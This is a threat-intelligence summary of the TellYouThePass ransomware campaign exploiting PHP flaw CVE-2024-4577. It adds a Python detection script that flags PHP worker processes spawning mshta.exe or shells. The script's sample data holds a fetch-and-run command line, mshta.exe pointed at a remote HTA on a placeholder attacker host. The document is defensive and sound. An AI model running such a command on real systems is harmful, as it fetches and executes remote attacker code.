Threat actors [2] [4], specifically the ransomware group TellYouThePass, have been exploiting a critical Remote Code Execution (RCE) vulnerability in PHP to execute arbitrary PHP code on targeted systems.
Description
Threat actors [2] [4], specifically the ransomware group TellYouThePass, have been exploiting the critical Remote Code Execution (RCE) vulnerability CVE-2024-4577 in PHP to execute arbitrary PHP code on targeted systems. This vulnerability affects all versions of PHP on Windows and XAMPP on Windows [4]. The attackers have been using the ‘system’ function to run an HTML application file hosted on an attacker-controlled Web server via the mshta.exe binary [5]. They have also been leveraging living-off-the-land tactics to run remote payloads and encrypt files [4], sending details about the infected machine to a C2 server [4].

Imperva researchers have observed that the ransomware operators quickly began exploiting this vulnerability after a proof-of-concept exploit was publicly released [1]. PHP developers have issued security updates to address the RCE vulnerability [1], urging system administrators to upgrade their PHP installations to the latest patched releases [1]. CISA has added CVE-2024-4577 to its Known Exploited Vulnerabilities catalog [4], urging government agencies to patch the flaw by July 3rd [4].

It is estimated that more than 450,000 exposed PHP servers, primarily in the US and Germany [2], could be vulnerable to this exploit [2] [7], which stems from unsafe character encoding conversions on Windows when used in CGI mode [7].

To mitigate the risk of exploitation through CVE-2024-4577, organizations are advised to patch affected systems and consider transitioning to more secure architectures such as Mod-PHP [5], FastCGI [5], or PHP-FPM [5]. Additionally, maintaining a strong awareness of assets and applications in the environment [5], patching vulnerabilities [1] [3] [5] [6], utilizing Web firewall technology [5], and deploying reliable anti-virus programs are recommended to prevent ransomware attacks similar to those conducted by TellYouThePass [5].
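The post-exploitation behaviour described above (PHP in CGI mode on Windows calling ‘system’ to launch mshta.exe against a remote HTA) leaves a recognisable parent/child process trail. The following detection script is an added example, not code from any of the cited reports; the event shape, the process-name lists and the sample events are constructed assumptions for illustration.

```python
# Added example: flag process-creation events where a Windows PHP CGI worker
# spawns mshta.exe or a shell. Event records are a constructed, simplified
# Sysmon-style shape (Computer, ParentImage, Image, CommandLine), not real logs.
import json

# Assumption: these are the typical parent images serving PHP on Windows/XAMPP.
PHP_PARENTS = {"php-cgi.exe", "php.exe", "httpd.exe"}
# Assumption: children that a web worker has no business launching.
SUSPICIOUS_CHILDREN = {"mshta.exe", "cmd.exe", "powershell.exe"}


def basename(path):
    """Return the file name from a Windows path, case-folded."""
    return path.rsplit("\\", 1)[-1].lower()


def is_remote_hta(cmdline):
    """True when mshta is handed an http(s) URL, i.e. an HTA fetched remotely."""
    lower = cmdline.lower()
    return "mshta" in lower and ("http://" in lower or "https://" in lower)


def analyze_event(ev):
    """Return an alert dict for a suspicious PHP-worker child process, else None."""
    parent = basename(ev.get("ParentImage", ""))
    child = basename(ev.get("Image", ""))
    if parent not in PHP_PARENTS or child not in SUSPICIOUS_CHILDREN:
        return None
    cmd = ev.get("CommandLine", "")
    # Remote HTA via mshta matches the reported tradecraft most closely.
    severity = "high" if is_remote_hta(cmd) else "medium"
    return {"host": ev.get("Computer"), "parent": parent,
            "child": child, "severity": severity, "cmd": cmd}


def scan(events):
    """Run analyze_event over an iterable of events and keep the alerts."""
    return [a for a in (analyze_event(e) for e in events) if a]


# Constructed sample events (attacker.example is a placeholder host name).
SAMPLE_EVENTS = [
    {"Computer": "web01", "ParentImage": "C:\\xampp\\php\\php-cgi.exe",
     "Image": "C:\\Windows\\System32\\mshta.exe",
     "CommandLine": "mshta.exe http://attacker.example/x.hta"},
    {"Computer": "web01", "ParentImage": "C:\\xampp\\apache\\bin\\httpd.exe",
     "Image": "C:\\xampp\\php\\php-cgi.exe", "CommandLine": "php-cgi.exe"},
    {"Computer": "ws02", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\mshta.exe",
     "CommandLine": "mshta.exe C:\\Users\\a\\local.hta"},
    {"Computer": "web01", "ParentImage": "C:\\xampp\\php\\php-cgi.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(json.dumps(alert))
```

Only the two events whose parent is the PHP CGI worker are flagged; the remote-HTA launch is rated high and the plain shell spawn medium.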
Conclusion
Organizations must act swiftly to patch affected systems and transition to more secure architectures to mitigate the risk of exploitation through CVE-2024-4577. Maintaining awareness of assets and applications [5], patching vulnerabilities [1] [3] [5] [6], utilizing Web firewall technology [5], and deploying reliable anti-virus programs are crucial steps to prevent ransomware attacks.
References
[1] https://cybersecuritynews.com/tellyouthepass-php-rce-flaw/
[2] https://www.technadu.com/recent-php-rce-flaw-exploited-by-tellyouthepass-ransomware/532399/
[3] https://www.scmagazine.com/news/php-flaw-exploited-by-tellyouthepass-ransomware-campaign
[4] https://duo.com/decipher/ransomware-attacks-leverage-recent-critical-php-flaw
[5] https://www.darkreading.com/vulnerabilities-threats/tellyouthepass-ransomware-exploits-critical-php-flaw
[6] https://linuxsecurity.com/news/security-vulnerabilities/cve-2024-4577-ransomware
[7] https://cyber.vumetric.com/security-news/2024/06/11/tellyouthepass-ransomware-exploits-recent-php-rce-flaw-to-breach-servers/